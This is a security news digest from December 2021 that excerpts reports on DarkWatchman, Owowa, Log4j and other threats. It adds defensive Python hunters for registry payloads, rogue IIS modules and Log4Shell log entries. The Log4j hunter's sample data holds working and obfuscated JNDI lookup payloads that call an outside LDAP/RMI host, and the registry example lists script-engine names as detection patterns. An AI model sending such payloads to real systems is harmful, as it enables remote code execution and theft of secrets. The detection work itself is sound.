December 16, 2021

Fortify Security Team

Title: ‘DarkWatchman’ RAT Shows Evolution in Fileless Malware
Date Published: December 16, 2021

Excerpt: “Dubbed DarkWatchman, the RAT – discovered by researchers at Prevailion’s Adversarial Counterintelligence Team (PACT) – uses the registry on Windows systems for nearly all temporary storage on a machine and thus never writes anything to disk. This allows it “to operate beneath or around the detection threshold of most security tools,” PACT researchers Matt Stafford and Sherman Smith wrote in a report published late Tuesday.”

Title: Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips
Date Published: December 16, 2021

Excerpt: “Dubbed “Spectra,” the vulnerability class relies on the fact that transmissions happen in the same spectrum and wireless chips need to arbitrate the channel access. This breaks the separation between Wi-Fi and Bluetooth to result in denial-of-service on spectrum access, information disclosure, and even enable lateral privilege escalations from a Bluetooth chip to code execution on a Wi-Fi chip. “The Wi-Fi chip encrypts network traffic and holds the current Wi-Fi credentials, thereby providing the attacker with further information,” the researchers said. “Moreover, an attacker can execute code on a Wi-Fi chip even if it is not connected to a wireless network.””

Title: State-Sponsored Hackers Abuse Slack API to Steal Airline Data
Date Published: December 15, 2021

Excerpt: “Slack is an ideal platform for concealing malicious communications as the data can blend well with regular business traffic due to its widespread deployment in the enterprise. This type of abuse is a tactic that other actors have followed in the past, so it’s not a new trick. Also, Slack isn’t the only legitimate messaging platform to be abused for relaying data and commands covertly.

In this case, the Slack API is utilized by the Aclip backdoor to send system information, files, and screenshots to the C2, while receiving commands in return. IBM researchers spotted the threat actors abusing this communication channel in March 2021 and responsibly disclosed it to Slack.”

Title: Grindr Fined for Selling User Data to Advertisers
Date Published: December 16, 2021

Excerpt: “The Norwegian Data Protection Authority (Datatilsynet), ruled that the way in which Grindr collected user consent did not meet with the regulations stipulated in the EU GDPR. And, as such, the disclosure of personal data was in breach of the Privacy Ordinance. Users had to accept the privacy statement in its entirety to use the app, and they were not specifically asked if they would consent to disclosure to third parties for marketing purposes. In addition, information about the disclosure of personal information was not clear or accessible enough to users.”

Title: Variant of Phorpiex Botnet Used for Cryptocurrency Attacks in Ethiopia, Nigeria, India and More
Date Published: December 16, 2021

Excerpt: “Check Point Research has discovered new attacks targeting cryptocurrency users in Ethiopia, Nigeria, India and 93 other countries. The cybercriminals behind the attacks are using a variant of the Phorpiex botnet — which Check Point called “Twizt” — to steal cryptocurrency through a process called “crypto clipping.” Because of the length of wallet addresses, most systems copy a wallet address and allow you to simply paste it in during transactions. With Twizt, cybercriminals have been able to substitute the intended wallet address with the threat actor’s wallet address.”

Title: New Fileless Malware Uses Windows Registry as Storage to Evade Detection
Date Published: December 16, 2021

Excerpt: “The RAT “utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation,” researchers Matt Stafford and Sherman Smith said, adding it “represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools.””
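Both DarkWatchman items above describe a RAT that keeps its code and working data in the registry. A practical caveat for defenders: the registry hives themselves are files on disk, so a `reg export` of the persistence keys, or offline hive analysis, still exposes the payload. The following is an added example of that hunt, written for this digest and not code from the Prevailion report or the articles quoted. It parses a constructed .reg export and flags values that are far larger than a normal autorun command line, or that launch a script engine from an autorun key. The key list, size threshold and script-engine regex are this example's own assumptions, not indicators taken from the report.

```python
"""Hunt a .reg export for registry values that look like fileless payload storage.

Added example (not from the DarkWatchman report): flag (a) values much larger
than any sane command line and (b) script-engine launchers in autorun keys.
Key paths, threshold and patterns below are assumptions chosen for the example.
"""
import re

# Persistence keys to treat as autorun locations (assumed list, extend as needed).
AUTORUN_KEYS = (
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
)
# Script hosts and LOLBins that rarely belong in a user's Run key (assumed list).
SCRIPT_RE = re.compile(
    r"(wscript|cscript|mshta|powershell|rundll32|regsvr32|jscript|javascript|ActiveXObject|eval\()",
    re.I,
)
SIZE_THRESHOLD = 2048  # bytes; legitimate Run entries are a few hundred at most

# Constructed sample of `reg export` output (not real malware data).
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
    r'"Updater"="wscript.exe //E:jscript //B \"C:\\Users\\alice\\AppData\\Local\\Temp\\u.js\""',
    "",
    r"[HKEY_CURRENT_USER\Software\Contoso\Cache]",
    '"blob"="' + "A" * 5000 + '"',   # oversized string value in a vendor key
    '"cfg"=hex:01,02,03,04',
])


def parse_reg(text):
    """Yield (key, name, kind, data_bytes) from a .reg export (string, dword, hex only)."""
    key = None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].rstrip()
        i += 1
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not m or key is None:
            continue
        name, raw = m.group(1), m.group(2)
        while raw.endswith("\\"):            # hex data continues on the next line
            raw = raw[:-1] + lines[i].strip()
            i += 1
        if raw.startswith('"') and raw.endswith('"'):
            s = raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            yield key, name, "REG_SZ", s.encode("utf-8")
        elif raw.startswith("dword:"):
            yield key, name, "REG_DWORD", bytes.fromhex(raw[6:])
        elif raw.startswith("hex"):
            payload = raw.split(":", 1)[1]
            yield key, name, "REG_BINARY", bytes.fromhex(payload.replace(",", ""))


def hunt(reg_text, size_threshold=SIZE_THRESHOLD):
    """Return findings as dicts: key, name, kind, size and the reasons it was flagged."""
    findings = []
    for key, name, kind, data in parse_reg(reg_text):
        reasons = []
        in_autorun = any(key.lower().endswith(a.lower()) for a in AUTORUN_KEYS)
        if len(data) > size_threshold:
            reasons.append("oversized")
        if kind == "REG_SZ" and in_autorun and SCRIPT_RE.search(data.decode("utf-8", "replace")):
            reasons.append("script-launcher-in-autorun")
        if reasons:
            findings.append({"key": key, "name": name, "kind": kind,
                             "size": len(data), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']} ({f['kind']}, {f['size']} bytes): {', '.join(f['reasons'])}")
```

On a live host the input would come from `reg export HKCU\Software out.reg /y` (and the HKLM equivalent), run per hive; the size check is the one that generalises to arbitrary vendor keys, since a payload has to live somewhere even when the launcher line itself looks innocuous.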

Title: A Deep Dive into an NSO Zero-Click iMessage Exploit: Remote Code Execution
Date Published: December 15, 2021

Excerpt: “The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn’t need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it’s a weapon against which there is no defense.”

Title: Owowa, a Malicious IIS Server Module Used to Steal Microsoft Exchange Credentials
Date Published: December 16, 2021

Excerpt: “Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange’s Outlook Web Access (OWA),” reads the analysis published by Kaspersky. “When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server.”
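A module loaded into IIS sits in the request pipeline ahead of the application, which is why a malicious one can read OWA form posts before Exchange does. The check a practitioner wants is an inventory of every native (`globalModules`) and managed (`modules`) entry in `applicationHost.config`, including the per-site `<location>` scopes where Exchange registers its own. The following is an added example written for this digest, not code from Kaspersky's analysis: it parses a constructed `applicationHost.config` and flags native modules whose DLL is outside an assumed allowlist of directories, and managed modules whose type is not in the `System.` or `Microsoft.` namespaces. The allowlists, the sample config and the module names in it are this example's assumptions.

```python
"""Audit IIS module registrations in applicationHost.config.

Added example (not Kaspersky's tooling). Flags native modules loaded from
outside the expected directories and managed modules from unexpected .NET
namespaces. Both allowlists are assumptions for this example; on a real
server pair this with Authenticode checks on the flagged DLLs.
"""
import xml.etree.ElementTree as ET

# Directories native IIS/Exchange modules are expected to live in (assumed, lowercase).
TRUSTED_NATIVE_PREFIXES = (
    "%windir%\\system32\\inetsrv\\",
    "%windir%\\microsoft.net\\",
    "c:\\program files\\microsoft\\exchange server\\",
)
# Namespaces managed modules are expected to come from (assumed).
TRUSTED_MANAGED_PREFIXES = ("System.", "Microsoft.")

# Constructed fragment of an applicationHost.config (not a real server's file).
SAMPLE_CONFIG = """<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\\System32\\inetsrv\\loghttp.dll" />
      <add name="ManagedEngineV4.0_64bit" image="%windir%\\Microsoft.NET\\Framework64\\v4.0.30319\\webengine4.dll" />
      <add name="kerbauth" image="C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\kerbauth.dll" />
      <add name="HealthCheck" image="C:\\inetpub\\temp\\hc.dll" />
    </globalModules>
  </system.webServer>
  <location path="Default Web Site/owa">
    <system.webServer>
      <modules>
        <add name="FormsAuthentication" type="System.Web.Security.FormsAuthenticationModule" />
        <add name="OwaHelper" type="Contoso.Owa.Helper, OwaHelper, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
      </modules>
    </system.webServer>
  </location>
</configuration>
"""


def _children(elem, tag):
    """Direct children with a given tag (avoids ElementPath quirks with dotted names)."""
    return [c for c in elem if c.tag == tag]


def audit_iis_modules(config_xml):
    """Return suspicious module registrations as dicts: scope, kind, name, target."""
    root = ET.fromstring(config_xml)
    # Global section first, then every <location path="..."> override.
    scopes = [("<global>", root)] + [(loc.get("path"), loc) for loc in _children(root, "location")]
    findings = []
    for scope_name, scope in scopes:
        for sws in _children(scope, "system.webServer"):
            for gm in _children(sws, "globalModules"):
                for add in _children(gm, "add"):
                    image = add.get("image", "")
                    if not image.lower().startswith(TRUSTED_NATIVE_PREFIXES):
                        findings.append({"scope": scope_name, "kind": "native",
                                         "name": add.get("name"), "target": image})
            for ms in _children(sws, "modules"):
                for add in _children(ms, "add"):
                    mtype = add.get("type")          # absent for native module references
                    if mtype and not mtype.split(",")[0].strip().startswith(TRUSTED_MANAGED_PREFIXES):
                        findings.append({"scope": scope_name, "kind": "managed",
                                         "name": add.get("name"), "target": mtype})
    return findings


if __name__ == "__main__":
    for f in audit_iis_modules(SAMPLE_CONFIG):
        print(f"[{f['scope']}] {f['kind']} module {f['name']} -> {f['target']}")
```

The namespace allowlist is a triage heuristic only: nothing stops an attacker naming an assembly `Microsoft.Something`, so a flagged-or-not decision on a real Exchange server should rest on the signature and location of the assembly behind each `type`, and on diffing the config against a known-good build. Note also that `web.config` files under the site root can register managed modules too, so the same walk should be run over those.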

Title: Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges
Date Published: December 15, 2021

Excerpt: “Even more troublingly, researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can “allow for exfiltration of sensitive data in certain circumstances.” Additional technical details of the flaw have been withheld to prevent further exploitation, but it’s not immediately clear if this has been already addressed in version 2.16.0.”

Title: Log4j: Making the Case for Structured Hunting
Date Published: December 16, 2021

Excerpt: “The Log4j vulnerability, without a doubt, is pretty bad. This is because, as a library, it isn’t as simple as compiling a list of affected applications or operating systems. It could be in almost anything. Similarly, all the different methods of exploiting it still aren’t known. This means that the impact of this vulnerability will probably be felt by organizations for years to come. But, by taking a different approach and using threat hunting proactively, organizations can feel more confident in their ability to detect malicious activity regardless of the point of initial access.”
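The two Log4j items above make the same practical point from different angles: the library can sit anywhere, so hunting has to work from the evidence attackers leave in logs rather than from an asset list. A naive search for the literal `${jndi:` misses most real traffic, because Log4j resolves nested lookups from the inside out, so `${${lower:j}ndi:...}`, `${${::-j}${::-n}${::-d}${::-i}:...}` and URL-encoded forms all reach the vulnerable lookup while looking different in a grep. The following is an added example written for this digest, not code from either article, Praetorian, or Check Point: it replays the context-free part of Log4j's nested evaluation (`lower:`, `upper:` and the `:-` default-value operator) over constructed Apache access-log lines and then searches the normalised text. The log lines and addresses are constructed (documentation IP ranges); the set of lookups the normaliser handles is this example's choice.

```python
"""Structured hunt for Log4Shell lookup strings in web-server logs.

Added example (not from the articles or Praetorian). Log4j evaluates nested
${...} lookups innermost-first, so the "jndi" keyword can be assembled at
runtime from ${lower:}, ${upper:} and the ":-" default operator, or hidden
by URL-encoding. This replays those context-free lookups, then searches.
Lookups that need runtime state (env, sys, date, ...) are left in place.
"""
import re
from urllib.parse import unquote

# A lookup whose body contains no further $, { or }: safe to evaluate now.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are hunting for after normalisation; group 1 is the URL scheme.
JNDI_RE = re.compile(r"\$\{\s*jndi:\s*([a-z]+)?[^}\s\"]*\}?", re.I)

# Constructed Apache combined-format lines (documentation addresses, not real traffic).
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [10/Dec/2021:14:01:02 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:01:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:31 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7:1389/b}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:40 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.12 - - [10/Dec/2021:14:03:05 +0000] "GET / HTTP/1.1" 200 612 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/d}" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:05:00 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:05:30 +0000] "GET /?msg=${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
])


def _resolve(body):
    """Evaluate one context-free lookup body; None means leave it untouched."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None                       # the target itself: never rewrite it
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${env:X:-fallback} and ${::-j} yield the fallback
        return body.split(":-", 1)[1]
    return None                           # env/sys/date/...: needs runtime state


def normalize_lookups(s, max_rounds=16):
    """Undo URL-encoding (possibly repeated) and collapse nested lookups innermost-first."""
    for _ in range(4):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNER_LOOKUP.sub(repl, s)
        if not changed:
            break
    return s


def hunt_log4shell(lines):
    """Return one finding per line that carries a (possibly obfuscated) JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, start=1):
        m = JNDI_RE.search(normalize_lookups(line))
        if m:
            findings.append({"line": n, "scheme": (m.group(1) or "").lower(), "evidence": m.group(0)})
    return findings


if __name__ == "__main__":
    for f in hunt_log4shell(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']}: {f['scheme']:5s} {f['evidence']}")
```

Two things worth noticing in the output: the literal word "jndi" in a benign path (line 6) does not fire, and a lookup that needs runtime state, such as `${env:AWS_SECRET_ACCESS_KEY}` embedded in the JNDI URL, is deliberately left in place, so the exfiltration-style payloads that the "second flaw" coverage above alludes to remain visible in the evidence string. The scheme field (`ldap`, `rmi`, `dns`, ...) is a cheap pivot: `dns` callbacks usually mean scanning, whereas `ldap`/`rmi` to an external host is a loading attempt worth chasing to the endpoint.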
